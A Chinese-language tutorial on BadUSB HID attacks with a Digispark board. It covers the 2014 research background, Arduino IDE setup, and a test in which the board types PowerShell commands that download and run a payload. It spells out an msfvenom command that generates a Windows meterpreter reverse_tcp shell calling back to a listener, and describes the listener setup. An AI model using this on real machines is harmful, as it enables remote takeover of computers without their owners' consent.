准備環境
開發板:digispark開發板(某寶上可以淘,十幾塊的就可以了)
工具:Arduino IDE
源碼下載地址:Msf
概述
在2014年美國黑帽大會上,安全研究人員JakobLell和獨立安全研究人員Karsten Nohl展示了他們稱為“BadUSB”的攻擊方法,這種攻擊方法讓USB安全和幾乎所有和USB相關的設備(包括具有USB端口的電腦)都陷入相當危險的狀態。
Badusb內部結構
從這張圖便可以了解到–Badusb和普通的U盤並沒有什么兩樣,因此迷惑性極高,很容易攻擊成功
Badusb Hid攻擊原理
HID(Human InterfaceDevice,是計算機直接與人交互的設備,例如鍵盤、鼠標等)攻擊的一種。攻擊者通過將USB設備模擬成為鍵盤,讓電腦識別成為鍵盤,然后進行腳本模擬按鍵進行攻擊。Badusb也屬於HID攻擊的一種,在badusb之前還有兩種HID攻擊分別是teensy和USB RUBBER DUCKY(usb橡皮鴨)。斗哥先介紹以下這三種類型有何不同。
配置Arduino IDE
打開 文件->首選項
把這個網址添加到附加開發板管理網址
http://digistump.com/package_digistump_index.json
在Arduino中添加Digispark的支持
打開 工具--開發板管理(Boards Managers)
等待開發板管理器加載完成,搜索digistump並安裝第一個Digistump AVR Boards
打開上面的鏈接,下載Digistump.Drivers
解壓后執行Install Drivers.exe即可
測試階段
使用kali linux生成一個Payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f exe > shell.exe
然后打開kali linux 終端輸入msfconsole
設置好監聽
使用phpstudy搭建一個本地的環境(注:也可以放在kail 的Apache /var/www/html 下)
打開Arduino
重點就是使用powershell下載
接着點擊☑️進行驗證, 驗證編譯沒問題進入下一步
驗證完整后下方會提示
接下來點擊上傳即可
然后請在60秒之內插入你准備好的digispark開發板(如果之前就插入了就再插一遍),沒問題的話它就會謝謝你(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿),就像這樣
插入digispark開發板后,它會自動打開cmd,並執行
插入一台win7操作系統電腦,如下
成功!!!